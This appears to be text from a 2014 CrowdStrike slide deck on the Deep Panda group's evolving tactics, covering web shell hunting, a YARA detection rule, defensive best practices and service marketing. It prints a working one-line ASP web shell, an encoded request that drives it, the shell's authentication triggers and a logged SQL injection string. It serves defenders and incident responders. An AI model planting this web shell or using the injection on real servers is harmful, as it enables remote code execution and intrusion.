Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/
Typical - Attacker TTPs
• Initial Attack Vector
• Malware
– Persistence Mechanism
– Command & Control
– Functionality
• Lateral Movement
• Data Extraction/Theft
2014 CrowdStrike, Inc. All rights reserved. 11
Shift in Attacker TTPs
2014 CrowdStrike, Inc. All rights reserved. 12
Attacker TTP Historical Trends Current Trends
Initial Attack
Vector
Spearphish and Vulnerable External
Facing Applications (Most Common)
No Significant Change
Malware –
Persistence
Mechanism
Installed as Service, Run Key, Etc. No Persistence
Malware –
Command &
Control
Beacon to Malicious IP or Domain No Standard Beacon Activity
Malware –
Functionality
Simple – Provides Shell or Basic
Upload/Download Functionality
Robust – Includes All Required
Functionality and Commands
Malware –
Location
Written to Disk Memory-Resident
Shift in Attacker TTPs (Cont.)
2014 CrowdStrike, Inc. All rights reserved. 13
Attacker TTP Historical Trends Current Trends
Lateral
Movement
Net Use, RDP or Utilities (e.g. PSExec) WMI, Service Accounts
Obfuscation Timestomp Standard Times (Windows
API)
Timestomp Both Standard and File
Times (Windows API and MFT)
Data Extraction Compress Data and Send to
Compromised Host Provider
No Significant Change
Last Hop
Communication
Source Country IPs (Most Often
Chinese, Russian, Iranian)
North American IPs, Anonymous
VPN Solutions, Cloud
Catalyst for Change
2014 CrowdStrike, Inc. All rights reserved. 14
• Shifts in Tactics
– Increased Intel Sharing
• Whitepapers
• Blog Posts
• Conference Demos
• VirusTotal
• US Government JIB (Joint
Indicator Bulletin)
Pros Cons
• Increased awareness /
detection for public
companies
• Decreased Intel gap for
smaller organizations
• Increased costs for
attackers to change TTPs
• Indicators become less
effective as attackers shift
TTPs (e.g. new malware,
C2 infrastructure)
• Attacks become more
advanced to avoid current
methods of detection
• Reduces visibility into
what attacker is doing and/
or targeting
Deep Panda – Simple Web Shell
• 28 byte web shell
• Active Server Page file
– Expected input is VBScript code (encoded as ASCII hex)
• The execute() function executes any VBScript passed to it
– Upload / download files
– Execute arbitrary commands (including WMI)
– Full access to file system
• Controlled by an attacker “thick client”
2014 Crowdstrike, Inc. All rights reserved. 19
<%execute request(chr(42))%>
Deep Panda – Simple Web Shell
2014 Crowdstrike, Inc. All rights reserved. 20
As a simple example of an encoded command, the following
GET request would cause the backdoor to execute the code
Response.Write(“<h1>Hello World</h1>”) and would render
“Hello World” to be printed in the web browser:
http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%6
9%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31
%3E%22%29
Web Shell Authentication
• Rudimentary (but effective)
authentication for incoming
connections
– Requires the presence of a cookie
named ‘zWiz’
– or HTTP header Keep-Alive = 320
– or language header containing es-
DN (invalid language)
• Prevents identification via search
engine indexing or vulnerability
scanning
2014 Crowdstrike, Inc. All rights reserved. 22
Hunting Web Shells – Identifying Intrusion Points
• Web shells are often one of the earliest stages of malware
• Search for activity on the system near the first known
compromise time
– Successful web scans in logs
– SQL injection
– Dropper malware
– Lateral movement from other compromised systems
– Pages created or modified within the webserver document root
2014 Crowdstrike, Inc. All rights reserved. 29
2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
Hunting Web Shells – Web Log Review
• Perform statistical analysis of page requests and search for
outliers
– See exactly when the web shells were in use via the web logs
2014 Crowdstrike, Inc. All rights reserved. 31
Hunting with YARA
• YARA signatures can be used
to search your enterprise for
specific patterns on disk and
in memory
2014 Crowdstrike, Inc. All rights reserved. 34
rule CrowdStrike_13091_01 : deep_panda alice RAT
{ meta:
description = "Detection of Mad Hatter .NET RAT"
last_modified = "2013-10-08"
version = "1.1"
in_the_wild = true
copyright = "CrowdStrike, Inc"
report = "CSIT-13091"
strings:
$marker1 = "alice'srabbithole" wide
$marker2 =
"{{"Version":{0},"HostName":"{1}","osVersion":
"{2}","tm":
"{3}","tz":{4}}}" wide
$marker3 = "InstManager.pdb"
$marker4 = "<osVersion>"
$marker5 = "<tm>"
$marker6 = "<tz>"
condition:
uint16(0) == 0x5A4D and uint32(uint32(0x3C)) ==
0x00004550 and
2 of ($marker*) }
Best Practices
• Proactive Defense of Your Network
– Isolate Critical Assets with Network Segmentation
– Consolidate and Monitor Internet Egress Points
– Implement Centralized Logging
– Patch, Patch, and Patch Again
– Secure Web Applications and Internal Software Projects
– Minimize or Remove Local Admin Privileges
– Implement a Tiered Active Directory Admin Model
– Incorporate Cyber Intelligence Feeds
2014 Crowdstrike, Inc. All rights reserved. 37
CrowdStrike Can Help!
• Services to Consider
– Tabletop Assessments (Yearly at Least)
• Keep your team primed and educated on latest attack vectors
– Next-Gen Penetration Testing
• More than just a cursory glance, take a real-world scenario approach
– Incident Response, Disaster Recovery and Business Continuity Plans
• CrowdStrike knowledge and experience can help you improve/build plans
– Incident Response Services Retainer
• Avoid paperwork related time delays
• CrowdStrike Intelligence Subscription
– Stay Up To Date with Latest Attacker TTPs
2014 CrowdStrike, Inc. All rights reserved. 38
2014 Crowdstrike, Inc. All rights reserved. 42
PROACTIVE
RESPONSE SERVICES
PROACTIVE
RESPONSE SERVICES
Counter Threat Assessment
IR Program Development
Next-Gen Pen Testing
Tabletop Assessment
InfoSec Capability Maturing Model
Adversary Assessments
INCIDENT
RESPONSE SERVICES
Computer Forensic Analysis
Litigation Support
Expert Witness Testimony
Remediation
Malware Analysis
Government-quality intelligence developed using an
‘all-source model’
Detailed technical and strategic analysis of 50+ adversaries’
capabilities, indicators and tradecraft, attribution and intentions
Customizable feeds and API for indicators of
compromise
Indicators can be integrated into current firewall, IDS/IPS, or
SIEM solutions to provide real-time attribution
Tailored Intelligence feature provides visibility into breaking events
that matter an organization’s brand, infrastructure, and customers
Falcon Intelligence: Threat Intelligence Subscription
2
3
4
1
5
2014 Crowdstrike, Inc. All rights reserved. 43
Falcon Host: Endpoint Threat Detection & Response
Identifies unknown malware & detects zero-day threats
Captures and correlates system events to identify adversary
activity in real-time
Maximum visibility across the full kill chain allows for insight into
past & current attacks
Context-based detection does not rely on signatures or easily
changed IOCs
Intelligence integration provides full attribution to identify context,
motivation, and actor behind an attack
2
3
4
1
5
2014 Crowdstrike, Inc. All rights reserved. 44
Falcon Host: Continuous Endpoint Activity Monitoring
Explore rich execution data collected by the Falcon Host sensors
Dashboards provide an at-a-glance view of recent activity for
investigative purposes
Expert-designed menu of queries provide the ability to proactively
hunt for malicious activity
2
3
1
2014 Crowdstrike, Inc. All rights reserved. 45